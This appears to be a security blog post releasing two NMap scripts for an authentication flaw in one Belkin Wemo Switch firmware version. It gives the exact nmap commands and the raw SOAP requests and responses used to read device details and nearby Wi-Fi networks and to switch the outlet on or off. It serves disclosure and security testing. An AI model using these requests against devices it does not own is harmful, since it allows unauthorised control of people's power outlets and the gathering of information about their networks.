Belkin Wemo Switch NMap Scripts
Belkin Wemo Switch Smart Plug is a network controlled power outlet. The current firmware version does not requiere authentication to switch the power ON or OFF or to gather information such as nearby wireless networks. Two NMap scripts have been published
Belkin Wemo Switch Smart Plug is a network controlled power outlet. The current firmware version WeMo_WW_2.00.10966.PVT-OWRT-SNS does not requiere authentication to switch the power ON or OFF or to gather information such as nearby wireless networks. Two NMap scripts have been published for this purposes.
wemo-info.nse
Download: https://github.com/hkm/nmap-nse-scripts/blob/master/wemo-info.nse
wemo-info.nse obtains information from Wemo Switch from an XML file and a service both located on the web interface on a port in the range 49152 to 49154. The XML file is located on the URL /setup.xml. This file contains information about the device such as name, model, version, serial, firwmare version and current switch state. Information about nearby wireless networks is gathered by issuing a SOAP request to /upnp/control/WiFiSetup1 using the method GetApList.
To gather information from a Belkin Wemo Switch use the following command:
# nmap --script wemo-info.nse -p49152-49254 <target>
Request:
POST /upnp/control/WiFiSetup1 HTTP/1.0 Host: 192.168.1.80 Content-Type: text/xml Content-Length: 239 SOAPACTION: "urn:Belkin:service:WiFiSetup1:1#GetApList" <?xml ?> <s:Envelope xmlns:s="https://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="https://schemas.xmlsoap.org/soap/encoding/"> <s:Body> <u:GetApList xmlns:u="urn:Belkin:service:WiFiSetup1:1"> </u:GetApList> </s:Body> </s:Envelope>
Response:
HTTP/1.0 200 OK CONTENT-LENGTH: 493 CONTENT-TYPE: text/xml; charset="utf-8" DATE: Thu, 22 Jun 2017 17:01:01 GMT EXT: SERVER: Unspecified, UPnP/1.0, Unspecified X-User-Agent: redsonic <s:Envelope xmlns:s="https://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="https://schemas.xmlsoap.org/soap/encoding/"><s:Body> <u:GetApListResponse xmlns:u="urn:Belkin:service:WiFiSetup:1"> <ApList>Page:1/1/6$ INFINITUM|1|24|WPA1PSKWPA2PSK/TKIPAES, INFINITUMu|5|0|WPA1PSKWPA2PSK/TKIPAES, INFINITUM|6|0|WPA2PSK/AES, INFINITUM|6|20|WEP, INFINITUM|8|29|WPA2PSK/AES, INFINITUM|10|10|WPA1PSKWPA2PSK/TKIPAES, </ApList> </u:GetApListResponse> </s:Body> </s:Envelope>
wemo-switch.nse
Download: https://github.com/hkm/nmap-nse-scripts/blob/master/wemo-switch.nse
wemo-switch.nse is a script that changes the switch state (ON/OFF). This script issues a SOAP request to /upnp/control/basicevent1 using the method SetBinaryState. This method is populated using the value defined in the NMap argument BinaryState.
In order to turn the device connected to the Wemo Switch OFF you would need to issue the following command:
# nmap --script wemo-switch.nse --script-args BinaryState=0 -p49152-49254 <target>
Request:
POST /upnp/control/basicevent1 HTTP/1.0 Content-Type: text/xml; charset="utf-8" HOST: 192.168.1.80 Content-Length: 316 SOAPACTION: "urn:Belkin:service:basicevent:1#SetBinaryState" Connection: close <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="https://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="https://schemas.xmlsoap.org/soap/encoding/"> <s:Body> <u:SetBinaryState xmlns:u="urn:Belkin:service:basicevent1:1"> <BinaryState>1</BinaryState> </u:SetBinaryState> </s:Body> </s:Envelope>
Response:
HTTP/1.0 200 OK CONTENT-LENGTH: 376 CONTENT-TYPE: text/xml; charset="utf-8" DATE: Thu, 22 Jun 2017 17:52:02 GMT EXT: SERVER: Unspecified, UPnP/1.0, Unspecified X-User-Agent: redsonic <s:Envelope xmlns:s="https://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="https://schemas.xmlsoap.org/soap/encoding/"><s:Body> <u:SetBinaryStateResponse xmlns:u="urn:Belkin:service:basicevent:1"> <BinaryState>1</BinaryState> <CountdownEndTime>0</CountdownEndTime> <deviceCurrentTime>1498153922</deviceCurrentTime> </u:SetBinaryStateResponse> </s:Body> </s:Envelope>
Subscribe to our Newsletter
Get the latest cybersecurity insights and updates delivered to your inbox.